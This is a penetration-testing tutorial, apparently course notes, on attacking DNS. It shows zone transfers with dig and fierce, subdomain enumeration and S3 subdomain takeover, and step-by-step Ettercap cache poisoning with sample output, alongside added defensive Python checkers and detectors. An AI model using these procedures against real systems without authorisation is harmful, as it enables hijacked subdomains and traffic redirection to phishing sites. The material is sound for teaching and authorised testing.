Attacking DNS
The Domain Name System (DNS) translates domain names (e.g., hackthebox.com) to numerical IP addresses (e.g., 104.17.42.72). DNS runs mostly over UDP/53, though reliance on TCP/53 keeps growing. DNS was designed from the start to use both UDP and TCP on port 53, with UDP as the default and a fallback to TCP when UDP cannot carry the exchange, typically because the response is too large for a single UDP packet. Since nearly all network applications depend on DNS, attacks against DNS servers represent one of the most prevalent and significant threats today.
Enumeration
DNS holds interesting information for an organization. As discussed in the Domain Information section in the Footprinting module, we can understand how a company operates and the services they provide, as well as third-party service providers like emails.
The Nmap -sC (default scripts) and -sV (version scan) options can be used to perform initial enumeration against the target DNS servers:
nmap -p53 -Pn -sV -sC 10.10.110.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 03:47 EDT
Nmap scan report for 10.10.110.213
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
DNS Zone Transfer
A DNS zone is a portion of the DNS namespace that a specific organization or administrator manages. Since DNS comprises multiple DNS zones, DNS servers utilize DNS zone transfers to copy a portion of their database to another DNS server. Unless a DNS server is configured correctly (limiting which IPs can perform a DNS zone transfer), anyone can ask a DNS server for a copy of its zone information since DNS zone transfers do not require any authentication. In addition, the DNS service usually runs on a UDP port; however, when performing DNS zone transfer, it uses a TCP port for reliable data transmission.
An attacker could leverage this DNS zone transfer vulnerability to learn more about the target organization’s DNS namespace, increasing the attack surface.
DIG - AXFR Zone Transfer
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb
; <<>> DiG 9.11.5-P1-1-Debian <<>> axfr inlanefrieght.htb @10.129.110.213
;; global options: +cmd
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
inlanefrieght.htb. 604800 IN AAAA ::1
inlanefrieght.htb. 604800 IN NS localhost.
inlanefrieght.htb. 604800 IN A 10.129.110.22
admin.inlanefrieght.htb. 604800 IN A 10.129.110.21
hr.inlanefrieght.htb. 604800 IN A 10.129.110.25
support.inlanefrieght.htb. 604800 IN A 10.129.110.28
inlanefrieght.htb. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.129.110.213#53(10.129.110.213)
;; WHEN: Mon Oct 11 17:20:13 EDT 2020
;; XFR size: 8 records (messages 1, bytes 289)
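The same check done by hand in Python (an added example, not HTB's or dig's code), to show what dig is doing on the wire: build an AXFR question, send it over TCP with the 2-byte length prefix the zone-transfer path requires, and read the server's verdict. The server/zone names are placeholders; REFUSED (rcode 5) is what a correctly restricted server returns, while an answer that opens with the SOA record means anyone can pull the zone.

```python
import socket, struct
def encode_name(name):                           # "a.b.c" -> b"\x01a\x01b\x01c\x00"
    labels = [bytes([len(lab)]) + lab.encode("ascii") for lab in name.rstrip(".").split(".")]
    return b"".join(labels) + b"\x00"

def build_axfr_query(zone, txid=0x1234):
    """Header (id, flags=0, qd=1, an/ns/ar=0) + question: QTYPE 252 (AXFR), class IN."""
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(zone) + struct.pack(">HH", 252, 1)

def decode_name(msg, off):
    """Decode a possibly compressed name; return (name, offset just after it)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                    # 2-byte compression pointer (RFC 1035 4.1.4)
            end = end or off + 2
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            return ".".join(labels) + ".", (end or off)
        labels.append(msg[off:off + length].decode("ascii"))
        off += length

def parse_response(msg):
    """Return (rcode, [(owner, rtype, rdata), ...]) for one DNS message."""
    _, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    off, records = 12, []
    for _ in range(qd):                              # skip the echoed question section
        off = decode_name(msg, off)[1] + 4
    for _ in range(an + ns + ar):
        name, off = decode_name(msg, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        records.append((name, rtype, msg[off + 10:off + 10 + rdlen]))
        off += 10 + rdlen
    return flags & 0xF, records

def classify_axfr(msg):
    rcode, rrs = parse_response(msg)
    if rcode == 0 and rrs and rrs[0][1] == 6:        # a real transfer opens with the SOA
        return "permitted"                           # finding: zone handed to anyone
    return "refused" if rcode == 5 else "rcode=%d" % rcode   # 5 = REFUSED: restricted

def check_axfr(server, zone, timeout=5):
    query = build_axfr_query(zone)
    with socket.create_connection((server, 53), timeout=timeout) as s:   # AXFR goes over TCP
        s.sendall(struct.pack(">H", len(query)) + query)                  # RFC 1035 4.2.2 framing
        f = s.makefile("rb")
        reply = f.read(struct.unpack(">H", f.read(2))[0])
    return classify_axfr(reply)
```

Run `check_axfr("ns1.inlanefreight.htb", "inlanefreight.htb")` against a name server you are authorised to test; a "permitted" result is the misconfiguration this section describes.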
Fierce
Tools like Fierce can also be used to enumerate all DNS servers of the root domain and scan for a DNS zone transfer:
fierce --domain zonetransfer.me
NS: nsztm2.digi.ninja. nsztm1.digi.ninja.
SOA: nsztm1.digi.ninja. (81.4.108.41)
Zone: success
{<DNS name @>: '@ 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2019100801 '
'172800 900 1209600 3600\n'
'@ 300 IN HINFO "Casio fx-700G" "Windows XP"\n'
'@ 301 IN TXT '
'"google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA"\n'
'@ 7200 IN MX 0 ASPMX.L.GOOGLE.COM.\n'
...SNIP...
Domain Takeovers & Subdomain Enumeration
Domain takeover means registering a domain name that is unregistered or has expired in order to gain control over another domain that still points to it. If attackers find an expired domain, they can claim it to perform further attacks such as hosting malicious content on a website or sending phishing emails that leverage the claimed domain.
Subdomain Takeover
A DNS canonical name (CNAME) record maps one name (an alias) to another name. Many organizations use third-party services like AWS, GitHub, Akamai, Fastly, and other content delivery networks (CDNs) to host their content. In this case, they usually create a subdomain and point it at those services.
sub.target.com. 60 IN CNAME anotherdomain.com
If anotherdomain.com expires and is available for anyone to claim, anyone who registers it will have complete control over sub.target.com until the DNS record is updated.
Subdomain Enumeration with Subfinder
./subfinder -d inlanefreight.com -v
[INF] Enumerating subdomains for inlanefreight.com
[alienvault] www.inlanefreight.com
[dnsdumpster] ns1.inlanefreight.com
[dnsdumpster] ns2.inlanefreight.com
...snip...
ns2.inlanefreight.com
www.inlanefreight.com
ns1.inlanefreight.com
support.inlanefreight.com
[INF] Found 4 subdomains for inlanefreight.com in 20 seconds 11 milliseconds
Subbrute (Internal Penetration Tests)
Subbrute allows using self-defined resolvers and performing pure DNS brute-forcing attacks during internal penetration tests on hosts that do not have Internet access.
git clone https://github.com/TheRook/subbrute.git >> /dev/null 2>&1
cd subbrute
echo "ns1.inlanefreight.com" > ./resolvers.txt
./subbrute.py inlanefreight.com -s ./names.txt -r ./resolvers.txt
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
inlanefreight.com
ns2.inlanefreight.com
www.inlanefreight.com
ms1.inlanefreight.com
support.inlanefreight.com
Checking for Subdomain Takeover
Using the nslookup or host command, enumerate the CNAME records for the discovered subdomains:
host support.inlanefreight.com
support.inlanefreight.com is an alias for inlanefreight.s3.amazonaws.com
If browsing to the subdomain returns a NoSuchBucket error, the subdomain is potentially vulnerable to takeover. You can claim it by creating an AWS S3 bucket with the same subdomain name.
Reference: can-i-take-over-xyz - Shows whether target services are vulnerable to subdomain takeover.
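A Python audit (added example, not part of the original notes or of can-i-take-over-xyz) that turns the manual host/NoSuchBucket check into something you can run over a list of subdomains: it parses `host` alias lines, flags CNAME targets that no longer resolve (dangling records), and flags targets on a takeover-prone provider whose error page shows the unclaimed fingerprint. The fingerprint table is a constructed two-entry subset; the resolver and HTTP fetch are injectable so the logic can be tested offline.

```python
import re, socket, urllib.error, urllib.request

# Short constructed subset of takeover fingerprints; the can-i-take-over-xyz project keeps the
# maintained list. Key: CNAME target suffix; value: (service, error text an unclaimed resource shows).
FINGERPRINTS = {
    "s3.amazonaws.com": ("AWS S3 bucket", "NoSuchBucket"),
    "github.io": ("GitHub Pages site", "There isn't a GitHub Pages site here"),
}
ALIAS_RE = re.compile(r"^(\S+?)\.? is an alias for (\S+?)\.?$")

def parse_host_output(lines):
    """Extract (subdomain, cname_target) pairs from `host` output lines."""
    pairs = []
    for line in lines:
        m = ALIAS_RE.match(line.strip())
        if m:
            pairs.append((m.group(1), m.group(2)))
    return pairs

def resolves(name):
    try:
        socket.gethostbyname(name)
        return True
    except socket.gaierror:                # NXDOMAIN: the CNAME target itself is gone
        return False

def fetch_body(host):
    """Providers answer with their error page on a 4xx, so keep the body on HTTPError."""
    try:
        with urllib.request.urlopen("http://%s/" % host, timeout=5) as r:
            return r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return ""

def assess(subdomain, target, resolves=resolves, fetch_body=fetch_body):
    """Verdict for one CNAME; resolver and fetcher are injectable for offline tests."""
    if not resolves(target):
        return "dangling: %s -> %s does not resolve; delete or repoint the record" % (subdomain, target)
    info = next((v for k, v in FINGERPRINTS.items() if target == k or target.endswith("." + k)), None)
    if info and info[1] in fetch_body(subdomain):
        return "claimable: %s points at an unclaimed %s (%r seen)" % (subdomain, info[0], info[1])
    return "ok: %s -> %s" % (subdomain, target)

def audit(host_output_lines, **probes):
    """Run assess() over every alias line; probes may override resolves/fetch_body."""
    return [assess(sub, tgt, **probes) for sub, tgt in parse_host_output(host_output_lines)]
```

Feed it the output of `host` for each subdomain from subfinder or subbrute; every "dangling" or "claimable" line is a record the domain owner should remove before someone else registers the target.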
DNS Spoofing (DNS Cache Poisoning)
DNS spoofing involves altering legitimate DNS records with false information so that they can be used to redirect online traffic to a fraudulent website.
Attack Paths
- Man-in-the-Middle (MITM) - Intercept communication between a user and a DNS server to route the user to a fraudulent destination
- DNS Server Exploitation - Exploit a vulnerability in a DNS server to modify DNS records
Local DNS Cache Poisoning with Ettercap
From a local network perspective, an attacker can perform DNS Cache Poisoning using MITM tools like Ettercap or Bettercap.
Step 1: Edit /etc/ettercap/etter.dns to map the target domain:
inlanefreight.com A 192.168.225.110
*.inlanefreight.com A 192.168.225.110
Step 2: Start Ettercap and scan for live hosts:
- Navigate to Hosts > Scan for Hosts
- Add the target IP (e.g., 192.168.152.129) to Target1
- Add the default gateway IP (e.g., 192.168.152.2) to Target2
Step 3: Activate dns_spoof attack:
- Navigate to Plugins > Manage Plugins
- Select dns_spoof
This sends the target machine fake DNS responses that resolve inlanefreight.com to the attacker’s IP address.
Verification:
C:\>ping inlanefreight.com
Pinging inlanefreight.com [192.168.225.110] with 32 bytes of data:
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Reply from 192.168.225.110: bytes=32 time<1ms TTL=64
Ping statistics for 192.168.225.110:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
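Detection logic for this attack from the defender's side (an added example, not part of the original notes): given DNS answers observed on the LAN and reference answers obtained from a resolver the local attacker cannot intercept, flag any external name that resolves to a private address, as in the ping output above, and any answer that disagrees with the reference. The observed rows and reference values are constructed sample data.

```python
import ipaddress

# Constructed sample of answers seen by a LAN DNS sensor: (client, qname, answer, answering server).
# The first two rows mirror the ping output above: a public name resolved to a LAN address.
OBSERVED = [
    ("192.168.152.129", "inlanefreight.com", "192.168.225.110", "192.168.152.2"),
    ("192.168.152.129", "www.inlanefreight.com", "192.168.225.110", "192.168.152.2"),
    ("192.168.152.130", "hackthebox.com", "104.17.42.72", "192.168.152.2"),
]
# Out-of-band reference answers from a resolver the LAN attacker cannot sit in front of
# (constructed values; in practice a DoH/DoT query from a separate vantage point).
REFERENCE = {"inlanefreight.com": {"10.129.110.22"}, "hackthebox.com": {"104.17.42.72"}}

def is_internal_name(qname, internal_zones):
    """Names under the org's own internal zones are allowed to resolve to private addresses."""
    return any(qname == z or qname.endswith("." + z) for z in internal_zones)

def detect_spoofing(observed, reference, internal_zones=()):
    """Flag answers that disagree with the reference, or that map external names to private IPs."""
    alerts = []
    for client, qname, answer, server in observed:
        ip = ipaddress.ip_address(answer)
        if ip.is_private and not is_internal_name(qname, internal_zones):
            alerts.append("%s: external name %s -> private %s via %s" % (client, qname, answer, server))
        expected = reference.get(qname)
        if expected and answer not in expected:
            alerts.append("%s: %s answered %s, reference says %s" % (client, qname, answer, sorted(expected)))
    return alerts

if __name__ == "__main__":
    for line in detect_spoofing(OBSERVED, REFERENCE):
        print("ALERT", line)
```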
Tools Summary
| Tool | Purpose |
|---|---|
| nmap | DNS service enumeration |
| dig | DNS queries and zone transfers (AXFR) |
| fierce | DNS enumeration and zone transfer scanning |
| subfinder | Subdomain enumeration from open sources |
| subbrute | DNS brute-forcing with custom resolvers |
| host / nslookup | CNAME record enumeration |
| ettercap / bettercap | Local DNS cache poisoning via MITM |
Key Takeaways
- DNS zone transfers (AXFR) can expose the entire DNS namespace if not properly restricted
- Subdomain takeover is possible when CNAME records point to expired/unclaimed third-party services
- DNS cache poisoning can redirect users to malicious sites via MITM attacks
- Always check for misconfigured DNS servers during reconnaissance